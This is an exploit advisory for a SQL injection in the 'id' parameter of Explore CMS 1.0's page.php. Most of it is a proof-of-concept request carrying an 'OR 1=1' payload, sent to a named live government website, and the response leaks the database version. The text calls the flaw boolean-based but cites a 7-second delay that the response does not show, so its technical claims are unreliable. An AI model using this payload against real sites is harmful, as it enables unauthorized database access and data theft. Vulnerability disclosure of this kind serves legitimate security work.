Explore CMS 1.0 SQL Injection

Explore CMS version 1.0 suffers from a remote SQL injection vulnerability.


MD5 | d4f9e56109dda02dd82e311a0e9680e4

# Exploit Title: explore CMS  - Boolean Based SQL Injection
# Date: 19/03/2022
# Exploit Author: Sajibe Kanti
# Vendor Name : EXPLORE IT
# Vendor Homepage: https://exploreit.com.bd
# CVE: On Request
# POC


#SQL Injection
SQL injection is a web security vulnerability that allows an attacker
to interfere with the queries that an application makes to its
database.
explore CMS is vulnerable to the SQL Injection in 'id' parameter of
the 'page' page.


#Steps to reproduce

Following URL is vulnerable to SQL Injection in the 'id' field.

GET /page.php?id=1%27%20OR%201%3d1%20OR%20%27ns%27%3d%27ns HTTP/1.1
Host: www.gdc.gov.bd
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Cookie: PHPSESSID=b4c39f2ff3b9470f39bc088ab9ba9320
Referer: https://www.gdc.gov.bd/
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36


HTTP/1.1 200 OK
content-encoding:
server: LiteSpeed
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
content-type: text/html; charset=UTF-8
transfer-encoding: chunked
date: Thu, 17 Mar 2022 07:27:21 GMT
vary: Accept-Encoding

10.3.34-MariaDB


Server accepts the payload and the response get delayed by 7 seconds.

#Impact

An attcker can compromise the database of the application by manual
method or by automated tools such as SQLmap.

--
Thanks
Sajibe Kanti

Related Posts